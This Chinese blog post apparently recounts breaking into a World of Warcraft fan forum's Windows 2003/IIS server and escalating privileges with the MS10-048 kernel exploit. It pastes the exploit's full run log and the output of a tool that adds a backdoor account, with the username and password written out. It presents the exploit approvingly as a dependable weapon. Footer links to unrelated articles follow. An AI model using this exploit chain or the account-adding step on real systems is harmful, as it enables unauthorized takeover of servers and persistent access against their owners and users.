今天搞了个wow的游戏论坛,服务器环境是win03 x86+iis6.0+php+mysql。

提权的时候各种无奈,mysql无权限,而且没root,试了几个别的方法都不行,实在没办法的时候,用MS10048试了下,成功了。

Dojibiron by Ronald Huizer, (c) master#h4cker.us  

[ ] Trying to allocate a page at NULL.

    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001

[ ] Bootstrapping kernel resolver.

    Module ntoskrnl.exe at 0x0000000000BD0000

    Base of driver: 0xFFFFF80001000000

    [+] Success.

[ ] Resolving PsReferencePrimaryToken

    [+] Success: 0xFFFFF8000129FE50

[ ] Resolving PsInitialSystemProcess

    [+] Success: 0xFFFFF800011D1FB0

[ ] Resolving PsLookupProcessByProcessId

    [+] Success: 0xFFFFF80001288BC0

[ ] Resolving PsDereferencePrimaryToken

    [+] Success: 0xFFFFF80001311B40

[+] Handle table retrieval succeeded.

    Userspace handle table: 0x00000000006B0000

    Kernelspace handle table: 0xFFFFF97FF7990000

    Handle table entries: 1024

[ ] Allocating fake HEAD page.

    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF

[ ] Setting up CBT filter hook.

    [+] Success.

[ ] Creating evil window

    [+] Success.

[ ] Destroyed handle at: 0xFFFFF97FF7990FC0

    pHead:	0xFFFFF97FF906BA00

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Trigger handle at: 0xFFFFF97FF7995AC0

    pHead:	0xFFFFF97FF90900A0

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0003

[ ] Writing pool addr to: 0xFFFFF97FF7990F7F

	~ MS10_048 X64 EXP        ~

	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	11111111110101010101111010101110101010101010101010101010111100000000000110

	110101010101010101010101010111100000000000110

	111100000000000110

	0000110

[ ] Checking the success flag.

    [+] Set to 2 exploit half succeeded

[ ] Destroying trigger window

    pHead:	0x00000000000003CA

    pOwner:	0x0000000000000000

    bType:	0x00 - TYPE_FREE

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Spawning half a shell...

    Command: D:\RECYCLER\add.exe

[+] Enjoy!

          ==========================================

              Api Add User Made By Cond0r

                    2011.3.20

              Adduser.exe UserName PassWord Group

          ==========================================

	 User List:

	-->  7ksf

	-->  ASPNET

	-->  Guestasdfa

	-->  IUSR_NJXW-12-5-2

	-->  IWAM_NJXW-12-5-2

	-->  SUPPORT_388945a0

	Group List:

	 --> Administrators

	 --> Backup Operators

	 --> Distributed COM Users

	 --> Guests

	 --> Network Configuration Operators

	 --> Performance Log Users

	 --> Performance Monitor Users

	 --> Power Users

	 --> Print Operators

	 --> Remote Desktop Users

	 --> Replicator

	 --> Users

	 --> HelpServicesGroup

	 --> IIS_WPG

	 --> TelnetClients 

 SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

利用api加用户工具,成功添加cond0r密码为123!@#asdASD的账户

MS10048依旧是Windows 2003 x86 的杀器的更多相关文章

  1. Windows 2003 FastCgi安装环境

    Windows 2003 IIS+PHP5.4.3 安装教程 一.准备相关组件 安装前,先安装IIS. 1.安装FastCgi for IIS6 Fastcgi官方网址是:http://www.iis ...

  2. Windows 2003上 SaltStack/Salt 和 psutil 可能存在的问题及解决

    今天把salt安装在windows 2003上,发现无法启动,随之而来的是一个有一个的坑,让我们一起逐个排查. 问题一(salt无法启动) salt无法启动,错误结果如图:

  3. Windows 2003】利用域&&组策略自动部署软件

    Windows 2003]利用域&&组策略自动部署软件 转自 http://hi.baidu.com/qu6zhi/item/4c0fa100dc768613cc34ead0 ==== ...

  4. 使用docker-compose 大杀器来部署服务 上

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  5. Windows 2003 Server 标准版启动问题解决(资源转贴)

    维护的系统之一是部署在windows2003 Server标准版的服务器上,可能是由于某个应用问题,导致远程重启失败,害得我在机房呆了一早晨,可算是够折腾的.最后按照官方文档解决,刚放文档地址是:ht ...

  6. 使用docker-compose 大杀器来部署服务 上(转)

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  7. 利用pentestbox打造ms17-010移动"杀器"

    本文首发Freebuf,属原创奖励计划,未经许可禁止转载. 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow ...

  8. [转]使用docker-compose 大杀器来部署服务 上

    本文转自:https://www.cnblogs.com/neptunemoon/p/6512121.html 使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker ...

  9. 使用docker-compose 大杀器来部署服务

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

随机推荐

  1. AES 推荐文章

    链接如下,写得很好!http://blog.csdn.net/a00553344/article/details/4002507

  2. PHP 转换接口编码

    2014年10月20日 10:45:19 有些时候调用接口的时候返回数据的编码不是utf-8的,需要转码 foreach ($arrInfo as $k => $v) { $encodeing ...

  3. nginx服务器的网站权限问题

    有时候我们的网站根目录会从一个目录迁移到另一个目录,如果我们服务器使用的是nginx或者Apache,我们一般会配置好网站根目录后然后往直接把网站解压或者上传到根目录中,这样引起的问题是无法对对文件进 ...

  4. js将map转换成数组

    /** * map转数组. * * @param {Map}map * map对象 * @return 数组 */ Share.map2Ary = function(map) { var list = ...

  5. OSG 初始化为非全屏窗口

    OSG默认的窗口时全屏的,调试的时候不方便. 在网上看到一段代码,可以非全屏显示 int _tmain(int argc, _TCHAR* argv[]){ osgViewer::Viewer vie ...

  6. 解决 internet connection sharing 启动不了

    1.确认Windows Firewall服务是否启动(有异常可参考下面) a.打开注册表,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ ...

  7. LINUX_bash

    $ myname=xor$ echo $myname xor 内容间空格$var="lang is $myname" echo $var lang is xor $ var='la ...

  8. iOS及时log日志查看工具 (iConsole)

    github下载地址:https://github.com/nicklockwood/iConsole 偶然看到的一个iOS及时log日志查看工具,通过该工具,我们可以在任何想看日志的时候,通过手势呼 ...

  9. Codeforces Round #360 (Div. 1) D. Dividing Kingdom II 并查集求奇偶元环

    D. Dividing Kingdom II   Long time ago, there was a great kingdom and it was being ruled by The Grea ...

  10. 【spring 配置文件】spring配置文件的解析

    一.总体结构 二.详解 1.spring <alias >标签 在对bean进行定义时,除了使用id属性来指定名称之外,为了提供多个名称,可以使用alias标签来指定.而所有的这些名称都指 ...